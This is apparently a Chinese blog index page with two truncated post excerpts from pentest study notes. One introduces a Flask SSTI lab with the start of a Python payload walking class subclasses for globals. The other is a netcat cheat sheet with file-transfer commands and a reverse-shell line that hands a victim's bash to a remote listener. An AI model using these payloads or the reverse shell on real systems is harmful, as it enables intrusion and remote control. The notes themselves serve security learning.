摘要: https://github.com/vulhub/vulhub/tree/master/flask/ssti GlobalsAttrCount=0 for a in ().__class__.__base__.__subclasses__(): if hasattr(a.__init__,'__g 阅读全文
posted @ 2021-01-11 20:22 TaiiHu 阅读(191) 评论(3) 推荐(0)
摘要: nc 1.Transferring Files 接收方: nc -lvvp 4444 > recive.file 发送方: nc -vv 10.0.1.1 4444 < send.file 2.Reverse Shell victim: nc -vv 10.0.1.1 4444 -e /bin/ba 阅读全文
posted @ 2021-01-11 16:40 TaiiHu 阅读(230) 评论(0) 推荐(0)